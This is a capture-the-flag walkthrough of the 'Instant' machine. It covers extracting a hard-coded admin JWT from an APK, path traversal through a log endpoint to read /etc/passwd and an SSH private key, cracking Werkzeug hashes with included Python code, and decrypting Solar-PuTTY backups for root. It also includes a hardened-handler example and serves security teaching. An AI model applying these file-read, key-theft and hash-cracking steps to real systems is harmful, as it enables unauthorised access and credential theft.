Reconnaissance#
- The initial port scan showed two open ports:
  - 80/tcp (HTTP), a web server
  - 22/tcp (SSH)

- The web application offered a mobile app for download in two places on the site.

- Clicking the download button fetched an Android package named instant.apk.

Enumeration#
- To analyze the Android application, I decompiled the APK with jadx to recover readable Java source. Mobile apps frequently ship API base URLs and hard-coded credentials in their code, so the decompiled tree is worth searching before touching the API itself.

- While recursively grepping the decompiled files for the target's name:
grep -r "instant"
I found a hard-coded admin JWT token.
- The same grep also revealed several API endpoints, including a Swagger UI page. Swagger UI renders an OpenAPI definition (JSON or YAML) as an interactive page that lists every endpoint with its methods (GET, POST, PUT, DELETE) and parameters and lets you send requests from the browser, which makes an exposed instance an excellent map of the API's attack surface.

- Browsing the Swagger UI listed all the available API endpoints. One of them was meant to read server log files, but it did not restrict which file it read, so I used it to read
/etc/passwd
and enumerate the system's users.
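Finding a token in an APK is only half the job; the next step is to see what it grants and whether it is still valid. The following is an added example, not code from the original write-up or from the target application: it mimics the recursive grep by regex-matching JWTs in decompiled source text, then decodes the header and claims without verifying the signature (we do not hold the server's key) and reports subject, role and expiry. The class name, claims, secret and token in the sample are constructed for the demo.

```python
from __future__ import annotations

import base64
import hashlib
import hmac
import json
import re
import time

# A compact JWS is three base64url segments; the header segment always starts
# with "eyJ" because it is the base64 of '{"' .
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]{4,}\.[A-Za-z0-9_-]{4,}\.[A-Za-z0-9_-]{4,}")


def b64url_decode(segment: str) -> bytes:
    """base64url without padding: restore the '=' padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def make_hs256_token(claims: dict, secret: bytes) -> str:
    """Mint a constructed HS256 token so the example runs offline (hypothetical secret)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def find_tokens(source_text: str) -> list[str]:
    """Equivalent of grepping the decompiled sources for embedded tokens."""
    return JWT_RE.findall(source_text)


def decode_unverified(token: str) -> tuple[dict, dict]:
    """Read header and claims without checking the signature (we don't hold the key)."""
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def triage(token: str, now: float | None = None) -> dict:
    """What does this token grant, and is it still usable?"""
    now = time.time() if now is None else now
    header, claims = decode_unverified(token)
    exp = claims.get("exp")
    return {
        "alg": header.get("alg"),
        "subject": claims.get("sub"),
        "role": claims.get("role"),
        "exp": exp,
        "expired": exp is not None and now >= exp,
    }


# Constructed stand-in for one decompiled Java file; the class, field, claims and
# secret are invented for the demo and are not the real application's code.
SAMPLE_TOKEN = make_hs256_token(
    {"sub": "admin", "role": "Admin", "iat": 1700000000, "exp": 4102444800},
    b"constructed-example-secret",
)
SAMPLE_SOURCE = (
    "public class ApiClient {\n"
    '    private static final String TOKEN = "' + SAMPLE_TOKEN + '";\n'
    "}\n"
)

if __name__ == "__main__":
    for tok in find_tokens(SAMPLE_SOURCE):
        print(triage(tok))
```

A token whose claims name an admin role and whose exp lies years in the future is effectively a permanent credential baked into every copy of the app; that is the finding to write up, independent of what the API does with it.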
Exploitation#
- Using the same file-read weakness in the log endpoint, I requested shirohige's private SSH key stored at:
/home/shirohige/.ssh/id_rsa
- After cleaning up the key's formatting so it parses as a valid key file, and restricting its permissions with chmod 600 (ssh refuses a key that is readable by others), I logged in via SSH:
ssh -i id_rsa -vl shirohige instant.htb

- Got the user flag.
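The bug that turns a "read a log file" endpoint into "read any file the service account can reach" is a missing path-containment check. The following is an added example, not the target's code and not from the original write-up: a hypothetical Python handler in its vulnerable form next to a hardened one, exercised against a throwaway directory tree (the paths, log contents and fake key are constructed). The hardened version both allowlists the file name and verifies the resolved path after following symlinks, and the demo shows why the second check is needed even when the first is present.

```python
from __future__ import annotations

import os
import re
import tempfile

# Allowlist for log names: no path separators, must end in .log (hypothetical policy).
SAFE_LOG_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*\.log$")


def read_log_vulnerable(log_dir: str, log_file_name: str) -> str:
    """Hypothetical vulnerable handler: user input is joined straight onto the log directory.
    '../' segments walk out of log_dir, and an absolute name makes os.path.join discard log_dir."""
    path = os.path.join(log_dir, log_file_name)
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


def read_log_safe(log_dir: str, log_file_name: str) -> str:
    """Hardened version: allowlist the name, then prove the resolved path stays inside log_dir."""
    if not SAFE_LOG_NAME.match(log_file_name):
        raise PermissionError(f"rejected log name {log_file_name!r}")
    base = os.path.realpath(log_dir)
    target = os.path.realpath(os.path.join(base, log_file_name))
    # realpath() collapses '..' and follows symlinks, so a symlinked log that points
    # outside the directory is caught here even though its name passed the allowlist.
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"{log_file_name!r} resolves outside {base}")
    with open(target, "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


def build_demo_tree() -> tuple[str, str]:
    """Create a throwaway tree: <root>/logs/app.log plus a constructed key outside it."""
    root = tempfile.mkdtemp(prefix="logread-demo-")
    logs = os.path.join(root, "logs")
    ssh_dir = os.path.join(root, "home", "user", ".ssh")
    os.makedirs(logs)
    os.makedirs(ssh_dir)
    with open(os.path.join(logs, "app.log"), "w") as fh:
        fh.write("INFO app started\n")
    with open(os.path.join(ssh_dir, "id_rsa"), "w") as fh:
        fh.write("-----BEGIN OPENSSH PRIVATE KEY-----\nCONSTRUCTED NOT A REAL KEY\n-----END OPENSSH PRIVATE KEY-----\n")
    # A symlink inside the log dir pointing outside it: passes the name allowlist, fails containment.
    os.symlink(os.path.join(ssh_dir, "id_rsa"), os.path.join(logs, "rotated.log"))
    return root, logs


def run_demo() -> dict:
    _root, logs = build_demo_tree()
    traversal = "../home/user/.ssh/id_rsa"
    out = {
        "legit_read": read_log_safe(logs, "app.log"),
        "vulnerable_leaks_key": "PRIVATE KEY" in read_log_vulnerable(logs, traversal),
    }
    for name in (traversal, "/etc/hostname", "rotated.log"):
        try:
            read_log_safe(logs, name)
            out[name] = "allowed"
        except PermissionError:
            out[name] = "blocked"
    return out


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k}: {v!r}")
```

The order of the checks matters: normalise first (realpath), then compare, because a containment check done on the raw string is defeated by encodings and by symlinks that the filesystem resolves only at open time.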

Privilege Escalation#
- While exploring the system, I discovered an SQLite database file named instant.db in:
/projects/mywallet/Instant-Api/mywallet/instance
Inspecting the database revealed a table of usernames and password hashes.
The hashes were in Werkzeug's format (scheme, salt and digest separated by $), so I started cracking them offline to recover the plaintext passwords.
In the /opt directory I also found backup files of Solar-PuTTY sessions. These backups hold saved session credentials in encrypted form and are protected by a password; using the SolarPuttyDecrypt tool, I decrypted the backup and recovered the stored credentials.

- With the root password recovered from the session backup, I switched to root.
- Got the root flag.
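Werkzeug hashes are self-describing, so cracking them needs nothing beyond the standard library once you know the layout. The following is an added example, not from the original write-up or the target application, and it assumes the pbkdf2 scheme (Werkzeug's format is pbkdf2:<digest>:<iterations>$<salt>$<hex>, with the salt's bytes and the UTF-8 password fed to PBKDF2-HMAC); the user names, salts, passwords and the tiny iteration count in the sample rows are constructed. It also converts a hash into the input format for hashcat mode 10900 (PBKDF2-HMAC-SHA256) for when a real wordlist is too large for pure Python.

```python
from __future__ import annotations

import base64
import hashlib
import hmac


def werkzeug_pbkdf2_hash(password: str, salt: str, iterations: int, digest: str = "sha256") -> str:
    """Build a hash in Werkzeug's pbkdf2 format: 'pbkdf2:<digest>:<iterations>$<salt>$<hex>'."""
    dk = hashlib.pbkdf2_hmac(digest, password.encode("utf-8"), salt.encode("utf-8"), iterations)
    return f"pbkdf2:{digest}:{iterations}${salt}${dk.hex()}"


def parse_werkzeug_pbkdf2(stored: str) -> tuple[str, int, str, str]:
    """Split a stored hash into (digest, iterations, salt, hex_digest). Only pbkdf2 is handled."""
    method, salt, hex_digest = stored.split("$", 2)
    parts = method.split(":")
    if len(parts) != 3 or parts[0] != "pbkdf2":
        raise ValueError(f"not a pbkdf2:<digest>:<iterations> hash: {method!r}")
    return parts[1], int(parts[2]), salt, hex_digest


def verify_werkzeug_pbkdf2(candidate: str, stored: str) -> bool:
    digest, iterations, salt, hex_digest = parse_werkzeug_pbkdf2(stored)
    dk = hashlib.pbkdf2_hmac(digest, candidate.encode("utf-8"), salt.encode("utf-8"), iterations)
    return hmac.compare_digest(dk.hex(), hex_digest)


def crack(stored: str, wordlist: list[str]) -> str | None:
    """Try each wordlist entry; every row has its own salt, so nothing is shared across rows."""
    for candidate in wordlist:
        if verify_werkzeug_pbkdf2(candidate, stored):
            return candidate
    return None


def crack_rows(rows: list[tuple[str, str]], wordlist: list[str]) -> dict[str, str | None]:
    return {user: crack(stored, wordlist) for user, stored in rows}


def to_hashcat_10900(stored: str) -> str:
    """hashcat mode 10900 (PBKDF2-HMAC-SHA256) input: sha256:<iter>:<b64 salt>:<b64 digest>."""
    digest, iterations, salt, hex_digest = parse_werkzeug_pbkdf2(stored)
    if digest != "sha256":
        raise ValueError("mode 10900 is PBKDF2-HMAC-SHA256 only")
    salt_b64 = base64.b64encode(salt.encode("utf-8")).decode("ascii")
    hash_b64 = base64.b64encode(bytes.fromhex(hex_digest)).decode("ascii")
    return f"sha256:{iterations}:{salt_b64}:{hash_b64}"


# Constructed rows standing in for the users table: invented names, salts and passwords.
# Iteration count kept low so the demo runs instantly; real Werkzeug hashes use far more.
SAMPLE_ROWS = [
    ("alice", werkzeug_pbkdf2_hash("winter2023", "constructedsalt1", 1000)),
    ("bob", werkzeug_pbkdf2_hash("not-in-the-wordlist", "constructedsalt2", 1000)),
]
WORDLIST = ["password", "123456", "winter2023", "letmein"]

if __name__ == "__main__":
    print(crack_rows(SAMPLE_ROWS, WORDLIST))
    print(to_hashcat_10900(SAMPLE_ROWS[0][1]))
```

Because the iteration count is part of the hash, the cost per guess is whatever the application chose; that is why a few hundred thousand iterations make a large wordlist impractical in Python and hashcat's GPU path (one converted line per row) is the realistic route.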

Summary#
Reconnaissance revealed two open ports: 80 (HTTP) and 22 (SSH). The web server offered a mobile application, instant.apk, for download. During enumeration I decompiled the APK with jadx and, by recursively grepping the decompiled code, uncovered a hard-coded admin JWT token and several API endpoints, including a Swagger UI page. One endpoint intended for reading logs did not restrict the file path, which let me read /etc/passwd and identify users. In the exploitation phase I used that same file read to obtain the SSH private key of the user shirohige, cleaned up its formatting, logged in over SSH and collected the user flag. For privilege escalation I found an SQLite database, instant.db, in the application's instance directory containing usernames and Werkzeug-hashed passwords, which I cracked. I also found Solar-PuTTY session backups in /opt; using the cracked password with SolarPuttyDecrypt, I decrypted them and recovered the root password, which gave me a root shell and the root flag.